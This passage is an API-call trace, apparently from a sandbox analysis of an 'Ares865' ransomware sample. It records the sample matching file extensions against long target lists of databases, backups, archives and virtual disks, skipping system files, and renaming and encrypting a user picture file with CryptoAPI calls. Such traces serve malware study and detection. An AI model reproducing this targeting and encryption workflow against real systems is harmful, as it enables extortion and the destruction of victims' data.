lpString2="^^^") returned 1 [0085.218] lstrlenW (lpString="abs") returned 3 [0085.218] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0085.218] lstrlenW (lpString="abx") returned 3 [0085.218] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0085.218] lstrlenW (lpString="accdb") returned 5 [0085.218] lstrcmpiW (lpString1="4.bmp", lpString2="accdb") returned -1 [0085.218] lstrlenW (lpString="accdc") returned 5 [0085.218] lstrcmpiW (lpString1="4.bmp", lpString2="accdc") returned -1 [0085.218] lstrlenW (lpString="accde") returned 5 [0085.218] lstrcmpiW (lpString1="4.bmp", lpString2="accde") returned -1 [0085.218] lstrlenW (lpString="accdr") returned 5 [0085.218] lstrcmpiW (lpString1="4.bmp", lpString2="accdr") returned -1 [0085.218] lstrlenW (lpString="accdt") returned 5 [0085.218] lstrcmpiW (lpString1="4.bmp", lpString2="accdt") returned -1 [0085.218] lstrlenW (lpString="accdw") returned 5 [0085.218] lstrcmpiW (lpString1="4.bmp", lpString2="accdw") returned -1 [0085.218] lstrlenW (lpString="accft") returned 5 [0085.218] lstrcmpiW (lpString1="4.bmp", lpString2="accft") returned -1 [0085.219] lstrlenW (lpString="adb") returned 3 [0085.219] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.219] lstrlenW (lpString="adb") returned 3 [0085.219] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.219] lstrlenW (lpString="ade") returned 3 [0085.219] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0085.219] lstrlenW (lpString="adf") returned 3 [0085.219] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0085.219] lstrlenW (lpString="adn") returned 3 [0085.219] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0085.219] lstrlenW (lpString="adp") returned 3 [0085.219] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0085.219] lstrlenW (lpString="alf") returned 3 [0085.219] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0085.219] lstrlenW (lpString="ask") returned 3 [0085.219] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0085.219] lstrlenW (lpString="btr") returned 3 [0085.219] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0085.219] lstrlenW (lpString="cat") returned 3 [0085.219] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0085.219] lstrlenW (lpString="cdb") returned 3 [0085.219] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0085.219] lstrlenW (lpString="ckp") returned 3 [0085.219] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0085.219] lstrlenW (lpString="cma") returned 3 [0085.219] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0085.219] lstrlenW (lpString="cpd") returned 3 [0085.219] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0085.219] lstrlenW (lpString="dacpac") returned 6 [0085.219] lstrcmpiW (lpString1="34.bmp", lpString2="dacpac") returned -1 [0085.219] lstrlenW (lpString="dad") returned 3 [0085.219] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0085.219] lstrlenW (lpString="dadiagrams") returned 10 [0085.219] lstrcmpiW (lpString1="tile34.bmp", lpString2="dadiagrams") returned 1 [0085.219] lstrlenW (lpString="daschema") returned 8 [0085.219] lstrcmpiW (lpString1="le34.bmp", lpString2="daschema") returned 1 [0085.220] lstrlenW (lpString="db-journal") returned 10 [0085.220] lstrcmpiW (lpString1="tile34.bmp", lpString2="db-journal") returned 1 [0085.220] lstrlenW (lpString="db-shm") returned 6 [0085.220] lstrcmpiW (lpString1="34.bmp", lpString2="db-shm") returned -1 [0085.220] lstrlenW (lpString="db-wal") returned 6 [0085.220] lstrcmpiW (lpString1="34.bmp", lpString2="db-wal") returned -1 [0085.220] lstrlenW (lpString="dbc") returned 3 [0085.220] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0085.220] lstrlenW (lpString="dbs") returned 3 [0085.220] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0085.220] lstrlenW (lpString="dbt") returned 3 [0085.220] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0085.220] lstrlenW (lpString="dbv") returned 3 [0085.220] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0085.220] lstrlenW (lpString="dbx") returned 3 [0085.220] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0085.220] lstrlenW (lpString="dcb") returned 3 [0085.220] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0085.220] lstrlenW (lpString="dct") returned 3 [0085.220] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0085.220] lstrlenW (lpString="dcx") returned 3 [0085.220] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0085.220] lstrlenW (lpString="ddl") returned 3 [0085.220] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0085.220] lstrlenW (lpString="dlis") returned 4 [0085.220] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0085.220] lstrlenW (lpString="dp1") returned 3 [0085.220] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0085.220] lstrlenW (lpString="dqy") returned 3 [0085.220] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0085.220] lstrlenW (lpString="dsk") returned 3 [0085.220] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0085.220] lstrlenW (lpString="dsn") returned 3 [0085.220] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0085.220] lstrlenW (lpString="dtsx") returned 4 [0085.220] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0085.220] lstrlenW (lpString="dxl") returned 3 [0085.220] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0085.221] lstrlenW (lpString="eco") returned 3 [0085.221] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0085.221] lstrlenW (lpString="ecx") returned 3 [0085.221] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0085.221] lstrlenW (lpString="edb") returned 3 [0085.221] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0085.221] lstrlenW (lpString="epim") returned 4 [0085.221] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0085.221] lstrlenW (lpString="fcd") returned 3 [0085.221] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0085.221] lstrlenW (lpString="fdb") returned 3 [0085.221] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0085.221] lstrlenW (lpString="fic") returned 3 [0085.221] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0085.221] lstrlenW (lpString="flexolibrary") returned 12 [0085.221] lstrcmpiW (lpString1="ertile34.bmp", lpString2="flexolibrary") returned -1 [0085.221] lstrlenW (lpString="fm5") returned 3 [0085.221] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0085.221] lstrlenW (lpString="fmp") returned 3 [0085.221] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0085.221] lstrlenW (lpString="fmp12") returned 5 [0085.221] lstrcmpiW (lpString1="4.bmp", lpString2="fmp12") returned -1 [0085.221] lstrlenW (lpString="fmpsl") returned 5 [0085.221] lstrcmpiW (lpString1="4.bmp", lpString2="fmpsl") returned -1 [0085.221] lstrlenW (lpString="fol") returned 3 [0085.221] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0085.221] lstrlenW (lpString="fp3") returned 3 [0085.221] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0085.221] lstrlenW (lpString="fp4") returned 3 [0085.221] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0085.221] lstrlenW (lpString="fp5") returned 3 [0085.221] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0085.221] lstrlenW (lpString="fp7") returned 3 [0085.221] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0085.221] lstrlenW (lpString="fpt") returned 3 [0085.221] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0085.221] lstrlenW (lpString="frm") returned 3 [0085.221] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0085.222] lstrlenW (lpString="gdb") returned 3 [0085.222] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.222] lstrlenW (lpString="gdb") returned 3 [0085.222] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.222] lstrlenW (lpString="grdb") returned 4 [0085.222] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0085.222] lstrlenW (lpString="gwi") returned 3 [0085.222] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0085.222] lstrlenW (lpString="hdb") returned 3 [0085.222] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0085.222] lstrlenW (lpString="his") returned 3 [0085.222] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0085.222] lstrlenW (lpString="ib") returned 2 [0085.222] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0085.222] lstrlenW (lpString="idb") returned 3 [0085.222] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0085.222] lstrlenW (lpString="ihx") returned 3 [0085.222] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0085.222] lstrlenW (lpString="itdb") returned 4 [0085.222] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0085.222] lstrlenW (lpString="itw") returned 3 [0085.222] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0085.222] lstrlenW (lpString="jet") returned 3 [0085.222] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0085.222] lstrlenW (lpString="jtx") returned 3 [0085.222] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0085.222] lstrlenW (lpString="kdb") returned 3 [0085.222] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0085.222] lstrlenW (lpString="kexi") returned 4 [0085.222] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0085.222] lstrlenW (lpString="kexic") returned 5 [0085.222] lstrcmpiW (lpString1="4.bmp", lpString2="kexic") returned -1 [0085.222] lstrlenW (lpString="kexis") returned 5 [0085.222] lstrcmpiW (lpString1="4.bmp", lpString2="kexis") returned -1 [0085.222] lstrlenW (lpString="lgc") returned 3 [0085.222] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0085.222] lstrlenW (lpString="lwx") returned 3 [0085.223] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0085.223] lstrlenW (lpString="maf") returned 3 [0085.223] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0085.223] lstrlenW (lpString="maq") returned 3 [0085.223] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0085.223] lstrlenW (lpString="mar") returned 3 [0085.223] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0085.223] lstrlenW (lpString="marshal") returned 7 [0085.223] lstrcmpiW (lpString1="e34.bmp", lpString2="marshal") returned -1 [0085.223] lstrlenW (lpString="mas") returned 3 [0085.223] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0085.223] lstrlenW (lpString="mav") returned 3 [0085.223] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0085.223] lstrlenW (lpString="maw") returned 3 [0085.223] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0085.223] lstrlenW (lpString="mdbhtml") returned 7 [0085.223] lstrcmpiW (lpString1="e34.bmp", lpString2="mdbhtml") returned -1 [0085.223] lstrlenW (lpString="mdn") returned 3 [0085.223] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0085.223] lstrlenW (lpString="mdt") returned 3 [0085.223] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0085.223] lstrlenW (lpString="mfd") returned 3 [0085.223] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0085.223] lstrlenW (lpString="mpd") returned 3 [0085.223] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0085.223] lstrlenW (lpString="mrg") returned 3 [0085.223] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0085.223] lstrlenW (lpString="mud") returned 3 [0085.223] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0085.223] lstrlenW (lpString="mwb") returned 3 [0085.223] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0085.223] lstrlenW (lpString="myd") returned 3 [0085.223] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0085.223] lstrlenW (lpString="ndf") returned 3 [0085.223] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0085.223] lstrlenW (lpString="nnt") returned 3 [0085.223] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0085.223] lstrlenW (lpString="nrmlib") returned 6 [0085.224] lstrcmpiW (lpString1="34.bmp", lpString2="nrmlib") returned -1 [0085.224] lstrlenW (lpString="ns2") returned 3 [0085.224] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0085.224] lstrlenW (lpString="ns3") returned 3 [0085.224] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0085.224] lstrlenW (lpString="ns4") returned 3 [0085.224] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0085.224] lstrlenW (lpString="nsf") returned 3 [0085.224] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0085.224] lstrlenW (lpString="nv") returned 2 [0085.224] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0085.224] lstrlenW (lpString="nv2") returned 3 [0085.224] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0085.224] lstrlenW (lpString="nwdb") returned 4 [0085.224] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0085.224] lstrlenW (lpString="nyf") returned 3 [0085.224] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0085.224] lstrlenW (lpString="odb") returned 3 [0085.224] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.224] lstrlenW (lpString="odb") returned 3 [0085.224] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.224] lstrlenW (lpString="oqy") returned 3 [0085.224] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0085.224] lstrlenW (lpString="ora") returned 3 [0085.224] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0085.224] lstrlenW (lpString="orx") returned 3 [0085.224] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0085.224] lstrlenW (lpString="owc") returned 3 [0085.224] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0085.224] lstrlenW (lpString="p96") returned 3 [0085.224] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0085.224] lstrlenW (lpString="p97") returned 3 [0085.224] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0085.224] lstrlenW (lpString="pan") returned 3 [0085.224] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0085.224] lstrlenW (lpString="pdb") returned 3 [0085.224] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0085.224] lstrlenW (lpString="pdm") returned 3 [0085.225] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0085.225] lstrlenW (lpString="pnz") returned 3 [0085.225] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0085.225] lstrlenW (lpString="qry") returned 3 [0085.225] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0085.225] lstrlenW (lpString="qvd") returned 3 [0085.225] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0085.225] lstrlenW (lpString="rbf") returned 3 [0085.225] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0085.225] lstrlenW (lpString="rctd") returned 4 [0085.225] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0085.225] lstrlenW (lpString="rod") returned 3 [0085.225] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0085.225] lstrlenW (lpString="rodx") returned 4 [0085.225] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0085.225] lstrlenW (lpString="rpd") returned 3 [0085.225] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0085.225] lstrlenW (lpString="rsd") returned 3 [0085.225] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0085.225] lstrlenW (lpString="sas7bdat") returned 8 [0085.225] lstrcmpiW (lpString1="le34.bmp", lpString2="sas7bdat") returned -1 [0085.225] lstrlenW (lpString="sbf") returned 3 [0085.225] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0085.225] lstrlenW (lpString="scx") returned 3 [0085.225] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0085.225] lstrlenW (lpString="sdb") returned 3 [0085.225] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0085.225] lstrlenW (lpString="sdc") returned 3 [0085.225] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0085.225] lstrlenW (lpString="sdf") returned 3 [0085.225] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0085.225] lstrlenW (lpString="sis") returned 3 [0085.225] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0085.225] lstrlenW (lpString="spq") returned 3 [0085.225] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0085.225] lstrlenW (lpString="te") returned 2 [0085.225] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0085.225] lstrlenW (lpString="teacher") returned 7 [0085.226] lstrcmpiW (lpString1="e34.bmp", lpString2="teacher") returned -1 [0085.226] lstrlenW (lpString="tmd") returned 3 [0085.226] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0085.226] lstrlenW (lpString="tps") returned 3 [0085.226] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0085.226] lstrlenW (lpString="trc") returned 3 [0085.226] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.226] lstrlenW (lpString="trc") returned 3 [0085.226] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.226] lstrlenW (lpString="trm") returned 3 [0085.226] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0085.226] lstrlenW (lpString="udb") returned 3 [0085.226] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0085.226] lstrlenW (lpString="udl") returned 3 [0085.226] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0085.226] lstrlenW (lpString="usr") returned 3 [0085.226] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0085.226] lstrlenW (lpString="v12") returned 3 [0085.226] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0085.226] lstrlenW (lpString="vis") returned 3 [0085.226] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0085.226] lstrlenW (lpString="vpd") returned 3 [0085.226] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0085.226] lstrlenW (lpString="vvv") returned 3 [0085.226] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0085.226] lstrlenW (lpString="wdb") returned 3 [0085.226] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0085.226] lstrlenW (lpString="wmdb") returned 4 [0085.226] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0085.226] lstrlenW (lpString="wrk") returned 3 [0085.226] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0085.226] lstrlenW (lpString="xdb") returned 3 [0085.226] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0085.226] lstrlenW (lpString="xld") returned 3 [0085.226] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0085.226] lstrlenW (lpString="xmlff") returned 5 [0085.226] lstrcmpiW (lpString1="4.bmp", lpString2="xmlff") returned -1 [0085.227] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp.Ares865") returned 90 [0085.227] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile34.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile34.bmp.ares865"), dwFlags=0x1) returned 1 [0085.228] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile34.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.229] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0085.229] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.229] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.229] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0085.229] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0085.230] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.230] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.230] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0085.234] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0085.237] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0085.237] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.237] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.238] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.238] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.238] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.238] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.238] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.238] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.238] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0085.238] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.238] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0085.238] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.238] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0085.239] CloseHandle (hObject=0x15c) returned 1 [0085.239] CloseHandle (hObject=0x118) returned 1 [0085.239] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.239] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0085.239] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.239] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4fccfe, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4fccfe, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd9ef6bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile35.bmp", cAlternateFileName="")) returned 1 [0085.239] lstrcmpiW (lpString1="usertile35.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.239] lstrcmpiW (lpString1="usertile35.bmp", lpString2="aoldtz.exe") returned 1 [0085.239] lstrcmpiW (lpString1="usertile35.bmp", lpString2=".") returned 1 [0085.239] lstrcmpiW (lpString1="usertile35.bmp", lpString2="..") returned 1 [0085.239] lstrcmpiW (lpString1="usertile35.bmp", lpString2="windows") returned -1 [0085.239] lstrcmpiW (lpString1="usertile35.bmp", lpString2="bootmgr") returned 1 [0085.239] lstrcmpiW (lpString1="usertile35.bmp", lpString2="temp") returned 1 [0085.239] lstrcmpiW (lpString1="usertile35.bmp", lpString2="pagefile.sys") returned 1 [0085.239] lstrcmpiW (lpString1="usertile35.bmp", lpString2="boot") returned 1 [0085.239] lstrcmpiW (lpString1="usertile35.bmp", lpString2="ids.txt") returned 1 [0085.239] lstrcmpiW (lpString1="usertile35.bmp", lpString2="ntuser.dat") returned 1 [0085.239] lstrcmpiW (lpString1="usertile35.bmp", lpString2="perflogs") returned 1 [0085.239] lstrcmpiW (lpString1="usertile35.bmp", lpString2="MSBuild") returned 1 [0085.239] lstrlenW (lpString="usertile35.bmp") returned 14 [0085.240] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp") returned 82 [0085.240] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile35.bmp" | out: lpString1="usertile35.bmp") returned="usertile35.bmp" [0085.240] lstrlenW (lpString="usertile35.bmp") returned 14 [0085.240] lstrlenW (lpString="Ares865") returned 7 [0085.240] lstrcmpiW (lpString1="e35.bmp", lpString2="Ares865") returned 1 [0085.240] lstrlenW (lpString=".dll") returned 4 [0085.240] lstrcmpiW (lpString1="usertile35.bmp", lpString2=".dll") returned 1 [0085.240] lstrlenW (lpString=".lnk") returned 4 [0085.240] lstrcmpiW (lpString1="usertile35.bmp", lpString2=".lnk") returned 1 [0085.240] lstrlenW (lpString=".ini") returned 4 [0085.240] lstrcmpiW (lpString1="usertile35.bmp", lpString2=".ini") returned 1 [0085.240] lstrlenW (lpString=".sys") returned 4 [0085.240] lstrcmpiW (lpString1="usertile35.bmp", lpString2=".sys") returned 1 [0085.240] lstrlenW (lpString="usertile35.bmp") returned 14 [0085.240] lstrlenW (lpString="bak") returned 3 [0085.240] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0085.240] lstrlenW (lpString="ba_") returned 3 [0085.240] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0085.240] lstrlenW (lpString="dbb") returned 3 [0085.240] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0085.240] lstrlenW (lpString="vmdk") returned 4 [0085.240] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0085.240] lstrlenW (lpString="rar") returned 3 [0085.240] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0085.240] lstrlenW (lpString="zip") returned 3 [0085.240] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0085.240] lstrlenW (lpString="tgz") returned 3 [0085.240] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0085.240] lstrlenW (lpString="vbox") returned 4 [0085.240] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0085.240] lstrlenW (lpString="vdi") returned 3 [0085.240] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0085.240] lstrlenW (lpString="vhd") returned 3 [0085.240] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0085.240] lstrlenW (lpString="vhdx") returned 4 [0085.240] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0085.240] lstrlenW (lpString="avhd") returned 4 [0085.241] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0085.241] lstrlenW (lpString="db") returned 2 [0085.241] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0085.241] lstrlenW (lpString="db2") returned 3 [0085.241] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0085.241] lstrlenW (lpString="db3") returned 3 [0085.241] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0085.241] lstrlenW (lpString="dbf") 